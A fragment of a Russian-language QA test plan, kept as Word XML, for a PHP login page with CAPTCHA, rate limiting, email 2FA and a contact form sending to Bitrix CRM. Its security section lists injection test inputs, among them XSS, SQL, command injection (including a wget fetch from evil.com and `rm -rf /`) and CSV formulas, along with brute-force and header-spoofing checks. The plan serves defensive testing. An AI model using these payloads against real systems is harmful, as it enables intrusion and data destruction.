              <w:t>_</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>CAPTCHA</w:t>
            </w:r>
            <w:r w:rsidRPr="001332B7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>_</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ERROR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Валидная капча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Пройти капчу и отправить корректные учётные данные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Логин продолжается по обычному сценарию без ошибки по капче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F5824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F5824">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Успешная авторизация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CAPTCHA-fail участвует в блокировке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раз отправить логин без/с неверной капчей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CAPTCHA-фейлы увеличивают счётчик; IP может дойти до блокировки (RATE-03)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Глобальное отключение капчи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Установить use_captcha=false в config.php и войти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Вход без капчи; блок капчи не отображается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332B7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332B7" w:rsidRDefault="001332B7">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>блок капчи не отображается</w:t>
            </w:r>
            <w:r w:rsidRPr="001332B7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авторизация</w:t>
            </w:r>
            <w:r w:rsidRPr="001332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успешна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Виджет капчи загружается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/contact/login/ с включённой капчей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Виджет SmartCaptcha отображается; скрипт captcha.js загружен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14506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14506">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Виджет SmartCaptcha отображается; скрипт captcha.js загружен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CAPTCHA-09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Порядок проверок: капча перед паролем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с валидными логин/пароль, но без капчи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капчи, пароль не проверяется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14506">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00BF5824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14506">
            <w:r>
              <w:t xml:space="preserve">Ошибка: </w:t>
            </w:r>
            <w:r w:rsidRPr="00114506">
              <w:t>Не пройдена проверка на робота. Проверьте, что капча загрузилась, и попробуйте снова.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4. Блокировка IP (Rate Limiting авторизации)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RATE-01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Блокировка после серии ошибок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 одного IP сделать 5 неуспешных попыток входа в пределах 10 мин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IP блокируется; «Слишком много попыток, попробуйте позже»; в auth есть BLOCKED, в attacks — запись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F0402">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="007F04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F0402" w:rsidP="00127109">
            <w:r>
              <w:t xml:space="preserve">Более 5 попыток неуспешной авторизации - Ошибка: </w:t>
            </w:r>
            <w:r w:rsidRPr="007F0402">
              <w:t>Слишком много попыток, попробуйте позже</w:t>
            </w:r>
            <w:r w:rsidR="00127109">
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidR="00127109">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>В attacks — запись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Повторная попытка с заблокированного IP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блокировки ещё раз отправить форму логина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Попытка отклоняется сразу (до проверки капчи); снова BLOCKED в auth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F0402">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="007F04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F0402">
            <w:r>
              <w:t xml:space="preserve">Ошибка: </w:t>
            </w:r>
            <w:r w:rsidRPr="007F0402">
              <w:t>Слишком много попыток, попробуйте позже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CAPTCHA-fail участвует в блокировке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раз отправить логин без капчи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CAPTCHA-фейлы увеличивают счётчик; IP может дойти до блокировки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Сброс счётчика после успешного входа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ошибок → успешный вход → снова ошибка 1 раз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Старый счётчик не должен сразу приводить к блокировке (contactLoginClearFailedAttempts)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Автоматическая разблокировка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Дождаться 30 минут после блокировки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IP разблокирован, вход снова возможен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F509E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="007F04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F509E">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>IP разблокирован, вход снова возможен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Автоочистка login_attempts.json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неудачных попыток, подождать более rate_limit_window (10 мин)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Устаревшие записи удаляются из JSON при следующей проверке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Счётчик не растёт для заблокированного IP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Заблокировать IP и продолжить отправлять запросы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attempt_count не увеличивается для IP в статусе blocked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F509E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="007F04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F509E">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>attempt_count не увеличивается для IP в статусе blocked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RATE-08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login_attempts.json не раздувается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циклов блокировки/разблокировки, проверить файл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Файл содержит только актуальные записи, старые удалены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5. Email 2FA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Старт 2FA после верного пароля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Войти под пользователем с включённой 2FA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Логин/пароль становятся readonly; появляется поле кода; письмо отправлено; в auth — 2FA_EMAIL_SENT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D1C02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D1C02" w:rsidP="00DD1C02">
            <w:r>
              <w:t>Успешная авторизация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2FA-02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Успешное подтверждение кода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корректный код из письма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Успешный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вход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117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> /contact/create;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auth — 2FA_EMAIL_SUCCESS </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>и</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> SUCCESS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D1C02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D1C02">
            <w:r>
              <w:t>Успешная авторизация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Пустой код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Нажать подтверждение без ввода кода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Сообщение: «Введите код из письма.»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AE4A45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AE4A45">
            <w:r>
              <w:t xml:space="preserve">Ошибка: </w:t>
            </w:r>
            <w:r w:rsidRPr="00AE4A45">
              <w:t>Введите код из письма.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Неверный код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неверный код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Сообщение: «Неверный код»; в auth — 2FA_EMAIL_FAIL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AE4A45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>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AE4A45">
            <w:r>
              <w:t xml:space="preserve">Ошибка: Неверный код. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>в auth — 2FA_EMAIL_FAIL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Истечение срока жизни кода (5 мин)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Дождаться истечения 2fa_code_lifetime, ввести старый код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«Срок действия кода истёк. Запросите новый код.»; в auth — 2FA_TIMEOUT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87220" w:rsidP="00787220">
            <w:r>
              <w:t xml:space="preserve">Ошибка: </w:t>
            </w:r>
            <w:r w:rsidRPr="00787220">
              <w:t>Срок действия кода истёк. Запросите новый код.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>В auth — 2FA_TIMEOUT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Повторная отправка раньше cooldown (60 сек)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Сразу нажать «Отправить код повторно»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Новый код не уходит, показывается сообщение с оставшимся временем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9364BC">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="009364B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9364BC" w:rsidRDefault="009364B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Кнопка </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>«Отправить код повторно» неактивна, код не приходит, отсчет оставшегося времени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Повторная отправка после cooldown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Дождаться cooldown (60 сек) и запросить код повторно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 почту приходит новый код; старый невалиден; в auth — 2FA_EMAIL_RESENT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9364BC">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="009364B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9364BC">
            <w:r>
              <w:t>На почту приходит новый код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Превышение лимита неверных кодов (5 попыток)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Несколько раз ввести неверный код до лимита 2fa_max_attempts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2FA-сессия сбрасывается; «Превышено количество попыток...»; в auth — 2FA_MAX_ATTEMPTS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87220">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="009364B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87220">
            <w:r>
              <w:t xml:space="preserve">При 5 попытке ошибка: </w:t>
            </w:r>
            <w:r w:rsidRPr="00787220">
              <w:t>Превышено количество попыток ввода кода. Войдите снова.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C21BEF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2FA-09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Сброс шага вручную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 w:rsidP="00706A36">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>На шаге 2FA нажать «</w:t>
            </w:r>
            <w:r w:rsidR="00706A36">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Выйти</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>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Поле кода исчезает; логин и пароль снова редактируемы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21BEF">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="009364B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B13805" w:rsidRDefault="00C21BEF" w:rsidP="00C21BEF">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>При нажатии на «Выйти» Поле кода исчезает; логин и пароль снова редактируемы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Запрет доступа к защищённой странице в pending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 шаге 2FA вручную открыть /contact/create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Редирект обратно на логин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Общий таймаут 2FA-сессии (10 мин)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Начать 2FA и ждать до истечения 2fa_session_timeout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Промежуточная сессия очищается; в auth — 2FA_TIMEOUT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2FA-12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Глобальное отключение 2FA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Выключить 2fa_global_enable=false и войти с персональной 2FA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Вход по паролю без шага ввода email-кода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2FA отключена у пользователя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Установить 2fa_enabled: false в users.json для пользователя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Вход без 2FA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F509E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</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="444444"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>☐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F509E">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Вход без 2FA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Пользователь удалён во время 2FA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Начать 2FA, убрать пользователя из users.json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«Не удалось продолжить вход. Войдите снова.»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Корректность формата email-кода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Получить письмо с кодом, проверить формат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6-значный численный код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D1C02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D1C02">
            <w:r>
              <w:t>На почту пришло письмо с 6 значным кодом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Тема письма 2FA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Получить письмо с кодом, проверить тему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Тема</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>значение</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> 2fa_email_subject </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>из</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> config.php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D4C59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0F7602" w:rsidRDefault="00DD1C02">
            <w:r>
              <w:t xml:space="preserve">На почту пришло письмо с темой: </w:t>
            </w:r>
            <w:r w:rsidRPr="00DD1C02">
              <w:t>Код подтверждения входа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отправки email (SMTP недоступен)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Изменить SMTP-хост на несуществующий, войти с 2FA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«Не удалось отправить код подтверждения. Попробуйте позже.»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Readonly-поля не доверяются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 шаге 2FA изменить readonly-поле логина через DevTools и отправить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Сервер игнорирует POST-значение, берёт логин из $_SESSION['pending_username']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B13805" w:rsidRPr="00B13805">
              <w:rPr>
                <w:color w:val="444444"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="444444"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">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2FA-19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JS-таймер на кнопке resend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 шаге 2FA наблюдать обратный отсчёт на кнопке повторной отправки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Кнопка disabled на время cooldown; таймер показывает секунды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13805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13805">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Таймер работает, показывает секунды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2FA-20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Количество 2FA-попыток после resend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Запросить новый код, затем вводить неверные коды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Счётчик 2fa_attempts не сбрасывается при resend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13805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13805">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Счётчик 2fa_attempts не сбрасывается при resend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6. Форма /contact/create — доступ и отправка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6.1. Доступ к форме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FORM-01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Доступ к форме после авторизации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Авторизоваться и открыть /contact/create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Страница доступна, форма отображается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D4C59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FD4C59">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Страница доступна, форма отображается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Отправка без активной авторизации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Очистить cookies и попробовать отправить форму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>JSON: «</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Сессия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авторизации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истекла</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">...»;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CONTACT_CREATE_AUTH_REQUIRED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025F9B" w:rsidRPr="00025F9B">
              <w:rPr>
                <w:color w:val="444444"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
            <w:r w:rsidR="00025F9B">
              <w:rPr>
                <w:color w:val="444444"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="444444"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>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Запрет работы формы в 2fa_pending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Начать 2FA и попытаться дойти до отправки формы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Доступ к форме не предоставляется до завершения 2FA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025F9B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025F9B">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Доступ к форме не предоставляется до завершения 2FA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POST с неверным form_id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Отправить</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> POST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tildaspec-formid=test123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JSON: «form not found»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 xml:space="preserve">☐ Pass  ☐ Fail  </w:t>
            </w:r>
            <w:r w:rsidR="00025F9B" w:rsidRPr="00025F9B">
              <w:rPr>
                <w:color w:val="444444"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
            <w:r w:rsidR="00025F9B">
              <w:rPr>
                <w:color w:val="444444"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="444444"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>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6.2. Валидация полей формы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Автозаполнение через DaData по ИНН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поле ИНН ввести 1234567890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Подсказка с названием компании; скрытые поля заполняются автоматически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D4C59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FD4C59">
            <w:r>
              <w:t>Автозаполнение всех полей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Автозаполнение по специфическому названию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Начать вводить специфическое название компании (ИНН 1234567890)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Нужная компания появляется в подсказках DaData; поля заполняются корректно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D4C59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FD4C59">
            <w:r>
              <w:t>При вводе названия организации, появляется в списке, поля заполянются при выборе организации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Успешная отправка автозаполненной формы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Заполнить форму через DaData, дозаполнить и отправить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JSON: «Форма успешно отправлена.»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D4C59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FD4C59" w:rsidRDefault="00FD4C59">
            <w:r>
              <w:t>Форма успешно отправлена.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">Открыть в Bitrix CRM: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (Значение)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6.3. Отправка в Bitrix CRM (без мока)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FORM-17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Успешная отправка в Bitrix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Заполнить и отправить форму валидными данными (bitrix_mock_mode=false)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JSON: «Форма успешно отправлена.» + ссылка; в bitrix_data — запись с ID компании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025F9B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025F9B">
            <w:r>
              <w:t xml:space="preserve">После успешной отправки </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>«Форма успешно отправлена.»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FORM-18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Ответ содержит ссылку на CRM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успешной отправки проверить JSON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Содержит HTML-ссылку формата https://crm.example.com/crm/company/details/XXXXX/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FORM-19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Bitrix REST API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Подменить bitrix_rest_api_url на невалидный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JSON: «Не удалось создать компанию в Bitrix CRM...»; в form_errors — BITRIX_ERROR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Пустой</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> URL Bitrix REST API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Очистить</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> bitrix_rest_api_url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>JSON-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ошибка</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">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BITRIX_ERROR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bitrix_rest_api_url_not_configured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Email-уведомление о заявке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с валидными данными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Письмо приходит на адреса из form_notification_emails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SMTP на уведомлении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Подменить SMTP-хост, отправить форму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>Bitrix-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>запрос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всё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равно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выполняется</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">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FORM_NOTIFICATION_EMAIL_FAIL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Маппинг полей в Bitrix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созданную компанию в Bitrix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Все поля (TITLE, ИНН, КПП, ОГРН, ОКВЭД, адрес) корректно маппируются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 w:rsidRPr="000F7602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b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">6.4. Rate limit </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>формы</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> /contact/create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Превышение rate limit формы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более 10 заявок за 1 час с одного IP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 (honey pot): «Заявка была отправлена, ожидайте обратную связь»; в form_errors — RATE_LIMIT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492AF2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00492AF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492AF2">
            <w:r>
              <w:t>Более 10 отправлений в час – сообщение «</w:t>
            </w:r>
            <w:r w:rsidRPr="00492AF2">
              <w:t>Заявка была отправлена, ожидайте обратную связь</w:t>
            </w:r>
            <w:r>
              <w:t>»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FORM-25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Rate limit: ответ маскируется под успех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При превышении лимита проверить JSON-ответ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Формат</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> {"message": "..."}, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>а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не</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> {"error": "..."} (honey pot pattern)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7. Безопасность и уязвимости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lang w:val="en-US"/>
              </w:rPr>
              <w:t>7.1. XSS (Cross-Site Scripting)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SEC-XSS-01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XSS в логине на форме входа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логин</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;script&gt;alert(1)&lt;/script&gt;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Скрипт не выполняется; текст экранируется; ошибка «Неверный логин или пароль»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025F9B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 xml:space="preserve"> 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>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025F9B">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ошибка «Неверный логин или пароль»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CF509E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>SEC-XSS-02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XSS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формы</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> /contact/create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117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> company </w:t>
            </w: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&lt;script&gt;alert(1)&lt;/script&gt;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JSON: honey pot;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SECURITY_INJECTION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типом</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> XSS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F509E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CF509E" w:rsidRDefault="00CF509E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SECURITY_INJECTION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типом</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> XSS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SEC-XSS-03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XSS через тег &lt;iframe&gt;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поле формы ввести &lt;iframe src="..."&gt;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инъекции, honey pot ответ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SEC-XSS-04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XSS через событие onload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&lt;img src=x onerror=alert(1)&gt;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SEC-XSS-05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XSS через javascript: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javascript:alert(1) в любое поле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SEC-XSS-06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Security-alert email </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>при</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> XSS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XSS-payload в поле формы create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Email приходит на адреса из security_alert_emails; содержит IP, поле, тип угрозы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lang w:val="en-US"/>
              </w:rPr>
              <w:t>7.2. SQL Injection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SEC-SQL-01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SQLi в поле логина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admin' OR '1'='1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«Неверный логин или пароль» (нет SQL — файловая БД)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025F9B">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00DD1C02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025F9B">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ошибка «Неверный логин или пароль»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SEC-SQL-02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SQLi в поле формы create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117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> company </w:t>
            </w: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'; DROP TABLE users; --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Honey pot </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ответ</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">;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form_errors — SECURITY_INJECTION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типом</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> SQLi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SEC-SQL-03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UNION SELECT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UNION SELECT * FROM users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SEC-SQL-04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SQLi через URL-encode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%27%20OR%201%3D1 (URL-encoded ' OR 1=1)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через проверку декодированной версии (urldecode + html_entity_decode)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lang w:val="en-US"/>
              </w:rPr>
              <w:t>7.3. Command Injection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SEC-CMD-01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Command Injection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формы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$(cat /etc/passwd)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Honey pot </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ответ</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">; SECURITY_INJECTION </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>с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типом</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> CmdExec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SEC-CMD-02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Обратные кавычки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`rm -rf /`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SEC-CMD-03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wget/curl инжект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wget http://evil.com/shell.sh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Обнаружение инъекции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lang w:val="en-US"/>
              </w:rPr>
              <w:t>7.4. CSV Injection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Injection через =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=CMD("calc") в начале значения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не ломается; значение экранируется; лидирующие =,+,-,@ защищены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Injection через +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+cmd|'/C calc'!A0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Значение записано безопасно в CSV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Injection через -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Ввести</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -1+1+cmd|'/C calc'!A0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Значение записано безопасно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Injection через @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@SUM(A1:A2)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Значение записано безопасно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Переносы строк в лог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значение с \r\n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не ломается, переносы удалены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SEC-CSV-06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Разделитель ; в значении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значение с точкой с запятой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корректно экранирует через fputcsv, колонки не ломаются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7.5. Другие атаки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Брутфорс пароля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Отправлять POST с разными паролями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5 попыток IP блокируется на 30 минут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Перебор 2FA-кодов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Перебирать 6-значные коды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5 неверных — 2FA_MAX_ATTEMPTS, сессия сброшена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Replay-атака с 2FA-кодом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Использовать код повторно после успешного входа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Код удалён из сессии после первого успешного использования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Подстановка proxy-заголовков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запрос с поддельным X-Forwarded-For: 1.2.3.4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Приватные IP из proxy-заголовков игнорируются (FILTER_FLAG_NO_PRIV_RANGE)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SEC-MISC-05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Session fixation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Подставить известный session ID до авторизации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session_regenerate_id(true) при успешном входе — старый ID не работает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Path traversal </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>к</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> users.json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Попробовать ../login/users.json и т.д.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Доступ запрещён через .htaccess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SEC-MISC-07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Прямой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доступ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</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> contact/login/sessions/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Открыть</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> URL contact/login/sessions/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403 Forbidden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8. Логи и техпроверки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8.1. Лог авторизации auth_YYYY-MM.csv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Структура auth-лога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Выполнить 1 успешную и 1 неуспешную попытку входа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CSV есть: Дата и время, IP адрес, User-Agent, Логин,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C7513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8C7513">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
